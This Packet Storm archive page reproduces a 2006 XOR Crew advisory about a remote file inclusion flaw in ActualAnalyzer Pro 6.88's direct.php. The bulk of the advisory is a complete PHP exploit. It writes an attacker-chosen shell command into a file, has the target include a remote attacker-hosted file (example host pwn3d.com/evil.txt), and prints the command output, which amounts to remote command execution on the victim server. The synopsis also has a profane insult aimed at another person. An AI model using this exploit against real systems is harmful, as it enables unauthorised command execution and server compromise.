what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ActualAnalyzer688.txt

ActualAnalyzer688.txt
Posted May 17, 2006
Authored by ReZEN

ActualAnalyzer version 6.88 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | dc38fc75a68d3e82d49d5485728cedb9905ffa1b7988096b195e17587fb92c55

ActualAnalyzer688.txt

Change Mirror Download
=======================================================================================
XOR Crew :: Security Advisory
4/10/2006
=======================================================================================
ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability
=======================================================================================
https://www.xorcrew.net/
https://www.xorcrew.net/ReZEN
=======================================================================================

:: Summary

Vendor : ActualScripts
Vendor Site : https://www.actualscripts.com/
Product(s) : ActualAnalyzer Pro v6.88
Version(s) : All
Severity : Medium/High
Impact : Remote Command Execution
Release Date : 4/10/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

Pro Edition — the professional solution for medium and large business
web sites. The
ability to collect high detailed statistics about each separate page of
web site will
help you effectively manage the overall Internet strategy and direction
of company,
successfully optimize and develop him.

=======================================================================================

II. Synopsis

FUCK YOU 'ASHTETICO' 0hday releasing wh0re.

There is a remote file inclusion vulnerability that allows for remote
command execution
in the /direct.php file. The bug is here on lines 5-8:

if(!isset($rf)) $rf='./';

require $rf.'common/error.php';
require $rf.'common/global.php';
require $rf.'common/config.php';
require $rf.'common/dbaccess.php';

the $rf variable is not set prior to being used in the require() function.
The vendor and support team have been contacted.

=======================================================================================

Exploit code:

-----BEGIN-----

<?php
/*
ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url: https://www.xorcrew.net/ReZEN

example:
turl: https://www.target.com/path to actualanalyzer/direct.php?rf=
hurl: https://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}

echo $form;

while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>


------END------

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, D2K

=======================================================================================

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close